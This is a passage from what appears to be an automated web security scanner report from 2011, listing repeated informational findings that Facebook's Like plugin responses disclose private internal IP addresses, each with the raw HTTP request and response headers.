Content-Length: 26162

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.59. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32c2954fc%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%253A%252F%252Fwww.toofab.com%252F2011%252F09%252F14%252Fmoms-on-set-how-do-they-do-it%252F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.22.49
X-Cnection: close
Date: Sat, 17 Sep 2011 00:50:38 GMT
Content-Length: 24981

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.60. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df289d11bf8%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff1f154075c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=Arial&href=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/columnists/view.bg?articleid=1366212
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.131.43
X-Cnection: close
Date: Sat, 17 Sep 2011 01:01:07 GMT
Content-Length: 25112

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.61. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27d797bd4%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-casey-anthony-jury-harvey-levin-tmz-live-this-is-america-i-can-speak-my-mind%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10fX3Mm8.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.133.43
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26177

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.62. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33cfc5094%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fmatthew-fox-no-criminal-charges-for-alleged-party-bus-fight%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10WIOp54.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.211.49
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26100

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.63. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df313bf28a8%26origin%3Dhttp%253A%252F%252Fbgs-soft.com%252Ff3985e46bc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fbgs-soft.com%2FProducts_Sgagent.asp&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=350 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bgs-soft.com/Products_Sgagent.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.22.51
X-Cnection: close
Date: Fri, 16 Sep 2011 19:47:20 GMT
Content-Length: 27056

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.64. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12a685ac%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff1815548cc%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%253A%252F%252Fwww.toofab.com%252F2011%252F09%252F15%252F2011-emmy-awards-vote-for-winners-list%252F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.13.47
X-Cnection: close
Date: Sat, 17 Sep 2011 00:50:38 GMT
Content-Length: 25908

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.65. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7aeca88%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff2f3f43e3%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=Arial&href=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.125.52
X-Cnection: close
Date: Sat, 17 Sep 2011 01:12:38 GMT
Content-Length: 25129

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.66. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=116046798441464&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28ab3d6f8%26origin%3Dhttp%253A%252F%252Fwww.toofab.com%252Ff124e6f7f8%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%253A%252F%252Fwww.toofab.com%252F2011%252F09%252F16%252Fexclusive-melissa-rivers-splits-with-boyfriend%252F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.255.75
X-Cnection: close
Date: Sat, 17 Sep 2011 00:51:03 GMT
Content-Length: 26052

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.67. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3180c02a4%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff3ef52693c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ2r73THKQ.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.6.27
X-Cnection: close
Date: Sat, 17 Sep 2011 00:55:55 GMT
Content-Length: 26354

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.68. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13acf715%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fstevie-wonder-steve-jobs-apple-concert-tribute-video-blind-ipod-ipad%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10RY4EHY.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.6.51
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26112

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.69. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=238200696226156&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df124d2da04%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&font=tahoma&href=http%3A%2F%2Fforums.cpanel.net%2Fshowthread.php%3Ft%3D96021&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.35.34
X-Cnection: close
Date: Fri, 16 Sep 2011 19:42:58 GMT
Content-Length: 26142

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.70. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dd14c5c4%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fmanny-pacquiao-burglarized-robbed-house-hancock-park-cops-police-hancock-park%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10bZv-X0.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.8.47
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26072

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.71. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=223691147655074&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21721243c%26origin%3Dhttp%253A%252F%252Fbostonherald.com%252Ff22b311d3c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=Arial&href=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110907sox_with_heels%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.47
X-Cnection: close
Date: Sat, 17 Sep 2011 01:07:03 GMT
Content-Length: 25128

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.72. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16156c634%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Ftareq-salahi-banned-journey-concerts-security-poster-michaele-neal-schon-atlanta%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10XDTS6o.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.24.83
X-Cnection: close
Date: Sat, 17 Sep 2011 00:52:23 GMT
Content-Length: 26093

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

21.73. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=like&api_key=127075842605&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d95ad7ec%26origin%3Dhttp%253A%252F%252Fwww.tmz.com%252Ff2c51297b%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F&layout=button_count&locale=en_US&node_type=link&ref=.TnQ10aZPrHo.like&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
